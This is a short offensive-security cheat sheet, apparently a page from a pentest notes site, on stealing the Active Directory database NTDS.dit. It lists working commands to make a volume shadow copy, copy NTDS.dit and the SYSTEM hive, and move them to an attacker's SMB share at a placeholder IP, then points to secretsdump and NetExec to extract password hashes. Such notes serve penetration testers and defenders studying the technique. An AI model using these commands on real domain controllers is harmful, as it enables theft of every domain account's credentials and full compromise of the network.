Attacking NTDS.dit
1️⃣ Create VSS Shadow Copy of C:
vssadmin CREATE SHADOW /For=C:Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy22️⃣ Copy NTDS.dit from Shadow Copy
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.ditSYSTEM hive (bootKey)3️⃣ Transfer NTDS.dit to Attack Machine
cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.X.X\CompDatacmd.exe /c move C:\Windows\System32\config\SYSTEM \\10.10.X.X\CompData4️⃣ Extract Hashes with Secretsdump
⚡ FASTEST METHOD – NetExec (Recommended)
Last updated
Was this helpful?
